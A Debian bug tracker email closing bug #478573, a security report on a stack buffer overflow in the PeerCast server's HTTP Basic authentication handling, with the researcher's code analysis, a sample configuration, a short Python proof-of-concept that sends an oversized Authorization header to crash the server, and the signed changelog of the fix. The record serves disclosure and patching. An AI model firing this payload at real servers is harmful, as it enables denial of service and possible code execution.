Bug#478573: marked as done ([peercast] CVE-2008-2040 stack-based buffer overflow in HTTP::getAuthUserPass function)

[Debian Bug Tracking System]

Your message dated Sat, 26 Jul 2008 09:57:49 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#478573: fixed in peercast 0.1217.toots.20060314-1etch1
has caused the Debian Bug report #478573,
regarding [peercast] CVE-2008-2040 stack-based buffer overflow in 
HTTP::getAuthUserPass function
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
478573: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=478573
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

--- Begin Message ---

Package: peercast
Severity: grave
Tags: security
X-Debbugs-CC: [EMAIL PROTECTED]

I found a security issue in the peercast server in the
HTTP::getAuthUserPass function. I already contacted the upstream author 6 days
ago and didn't get an answer yet so I am publishing this now.

From core/common/http.cpp:

105 void HTTP::getAuthUserPass(char *user, char *pass)
106 {
107         if (arg)
108         {   
109                 char *s = stristr(arg,"Basic");
110                 if (s) 
111                 {   
112                         while (*s)
113                                 if (*s++ == ' ')
114                                         break;
115                         String str;
116                         str.set(s,String::T_BASE64);
117                         str.convertTo(String::T_ASCII);
118                         s = strstr(str.cstr(),":");
119                         if (s) 
120                         {   
121                                 *s = 0;
122                                 if (user)
123                                         strcpy(user,str.cstr());
124                                 if (pass)
125                                         strcpy(pass,s+1);

This function is used if authentication to the peercast server is done by basic 
http auth
rather than by a cookie. In line 116 the base64 encoded string is copied into 
str.
Note the set method is peercasts own implementation of set since it 
reimplements the String
class. set looks like this:

From core/common/sys.h:
38                 MAX_LEN = 256 
...
62         void set(const char *p, TYPE t=T_ASCII)
63         {   
64                 strncpy(data,p,MAX_LEN-1);
65                 data[MAX_LEN-1] = 0;
66                 type = t;
67         }   

In line 117 the string gets decoded and in line 118 and 
following the part before ':' in the decoded string gets copied
into user and the part after it into pass.

From core/common/servhs.cpp:
558 bool Servent::handshakeAuth(HTTP &http,const char *args,bool local)
559 {
560         char user[64],pass[64];
561         user[0] = pass[0] = 0;
...
580     while (http.nextHeader())
581         {   
582                 char *arg = http.getArgStr();
583                 if (!arg)
584                         continue;
585
586                 switch (servMgr->authType)
587                 {   
588                         case ServMgr::AUTH_HTTPBASIC:
589                                 if (http.isHeader("Authorization"))
590                                         http.getAuthUserPass(user,pass);
591                                 break;

user and pass are only declared to have 64 bytes (line 558) while the buffer 
used for 
copy can store up to MAX_LEN (256) bytes (ok minus the : here). 
Servent::handshakeAuth calls then
the getAuthUserPass function triggering a buffer overflow.
It's thus possible to crash the server and execute arbitrary code if the server
allows http-basic authentication.

I already requested a CVE id for this.

An example configuration and PoC is attached.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

[Server]
serverPort = 7144
autoServe = Yes
forceIP = 
isRoot = No
maxBitrateOut = 0
maxRelays = 2
maxDirect = 0
maxRelaysPerChannel = 0
firewallTimeout = 30
forceNormal = No
rootMsg = 
authType = http-basic
cookiesExpire = session
htmlPath = html/en
minPGNUIncoming = 10
maxPGNUIncoming = 20
maxServIn = 50
chanLog = 
networkID = 00000000000000000000000000000000

[Broadcast]
broadcastMsgInterval = 10
broadcastMsg = 
icyMetaInterval = 8192
broadcastID = 008145B5C0427118B595AF7D9E110000
hostUpdateInterval = 180
maxControlConnections = 3
rootHost = yp.peercast.org

[Client]
refreshHTML = 5
relayBroadcast = 30
minBroadcastTTL = 1
maxBroadcastTTL = 7
pushTries = 5
pushTimeout = 60
maxPushHops = 8
autoQuery = 0
queryTTL = 7

[Privacy]
password = s0mep4ss
maxUptime = 0

[Filter]
ip = 255.255.255.255
private = Yes
ban = No
network = Yes
direct = Yes
[End]

[Notify]
PeerCast = Yes
Broadcasters = Yes
TrackInfo = Yes
[End]

[Server1]
allowHTML = Yes
allowBroadcast = Yes
allowNetwork = Yes
allowDirect = Yes
[End]

[Server2]
allowHTML = No
allowBroadcast = Yes
allowNetwork = No
allowDirect = No
[End]

[Debug]
logDebug = No
logErrors = No
logNetwork = No
logChannel = No
pauseLog = No
idleSleepTime = 10

#!/usr/bin/env python

import sys, socket

port = 7144
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'

if(len(sys.argv) < 2):
	print "ERR: please specify a hostname"
	sys.exit(-1)

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((sys.argv[1], port))
	s.send(buff);
except:
	print "ERR: socket()"
	sys.exit(-1)

pgpl14JkUlq3G.pgp
Description: PGP signature

--- End Message ---

--- Begin Message ---

Source: peercast
Source-Version: 0.1217.toots.20060314-1etch1

We believe that the bug you reported is fixed in the latest version of
peercast, which is due to be installed in the Debian FTP archive:

libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb
  to 
pool/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb
libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb
peercast-handlers_0.1217.toots.20060314-1etch1_all.deb
  to pool/main/p/peercast/peercast-handlers_0.1217.toots.20060314-1etch1_all.deb
peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb
  to 
pool/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb
peercast_0.1217.toots.20060314-1etch1.diff.gz
  to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1.diff.gz
peercast_0.1217.toots.20060314-1etch1.dsc
  to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1.dsc
peercast_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Romain Beauxis <[EMAIL PROTECTED]> (supplier of updated peercast package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Sun, 18 May 2008 03:28:44 +0200
Source: peercast
Binary: libpeercast0 peercast-handlers peercast-servent peercast 
libpeercast0-dev
Architecture: source amd64 all
Version: 0.1217.toots.20060314-1etch1
Distribution: stable-security
Urgency: low
Maintainer: Romain Beauxis <[EMAIL PROTECTED]>
Changed-By: Romain Beauxis <[EMAIL PROTECTED]>
Description: 
 libpeercast0 - P2P audio and video streaming server libraries
 libpeercast0-dev - P2P audio and video streaming server -- development
 peercast   - P2P audio and video streaming server metapackage
 peercast-handlers - P2P audio and video streaming handlers
 peercast-servent - P2P audio and video streaming servent
Closes: 478573
Changes: 
 peercast (0.1217.toots.20060314-1etch1) stable-security; urgency=low
 .
   * Fixed CVE-2008-2040:
     | stack-based buffer overfow in the
     | HTTP::getAuthUserPass function leading
     | to remote DoS or arbitrary code execution
     | if peercast is configured to use http-basic
     | authentication
     Closes: #478573
   Thanks to Nico Golde <[EMAIL PROTECTED]> for reporting and fixing
   the issue.
Files: 
 10e545471f649cd37409dc9cbfd7960a 1070 sound optional 
peercast_0.1217.toots.20060314-1etch1.dsc
 c7fc173230621f05137a6420a48b3347 7458 sound optional 
peercast_0.1217.toots.20060314-1etch1.diff.gz
 ac385ad05a69ba429c2e300920ff1192 6828 sound optional 
peercast-handlers_0.1217.toots.20060314-1etch1_all.deb
 0a0bd5ef6f4c6632d3f904100474f66a 2924 sound optional 
peercast_0.1217.toots.20060314-1etch1_amd64.deb
 d42cf469c93a79a328d7e8e31bc9c90c 50774 sound optional 
peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb
 2378fddac9eea542ee891cb96d77b8d4 172136 libs optional 
libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb
 53638a13906e1599c5938d067ffe729b 323944 libdevel optional 
libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSDLETgC5aaocqV0ZAQIWmgf/Y3afdxpaURG/frqBCDTdqs5Bw2RD5GRJ
VqeCaWerXVnYAODF+Ao3nWfz5mpB4kZCwKLaaymONyX/0O14Yl4y3URJTAHjZxyr
ci8Vq8MGHwiOWUxLfbkBgf+eNtuXK6MN/lobPcAICusFgwz0ttDDfaqpvwF24kWM
534PxFdNbwofEMlY6XloJdf0N3X7NUwrWGx1ei4N66HH5KX4Ckycs1qdRsFqCsCo
2lcB1ew23byijfe4JlpX3ZAY1vUDBZSqDl9wEroZh5LIuih6XBnmAsy/RcEj8Do3
FgewdgSwsOfWiI9neYmM17+o01XQpSfjmlindHFPNwnK2BS5nw9JxQ==
=s9DG
-----END PGP SIGNATURE-----

--- End Message ---